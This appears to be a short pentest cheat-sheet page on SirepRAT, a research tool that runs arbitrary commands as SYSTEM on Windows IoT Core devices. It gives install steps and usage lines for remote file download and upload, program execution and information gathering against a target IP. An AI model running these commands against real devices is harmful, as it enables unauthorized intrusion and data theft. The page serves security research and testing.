Skip to content

SirepRAT - RCE as SYSTEM on Windows IoT Core

SirepRAT Features full RAT capabilities without the need of writing a real RAT malware on target.

https://github.com/SafeBreach-Labs/SirepRAT#context)

Installation

1
2
3
4
5
# Download the repository
git clone https://github.com/SafeBreach-Labs/SirepRAT.git

# Run the installation
pip install -r requirements.txt

Basic usage

Usage

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
# Download File bash
python SirepRAT.py $ip GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

# Upload File
python SirepRAT.py $ip PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

# Run Arbitrary Program
python SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

# With arguments, impersonated as the currently logged on user:
python SirepRAT.py $ip LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

# Try to run it without the as_logged_on_user flag to demonstrate the SYSTEM execution capability)
# Get System Information
python SirepRAT.py $ip GetSystemInformationFromDevice

Get File Information

1
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

See help for full details:

1
python SirepRAT.py --help

Author

Last update: 2024-01-10
Created: January 10, 2024 22:09:40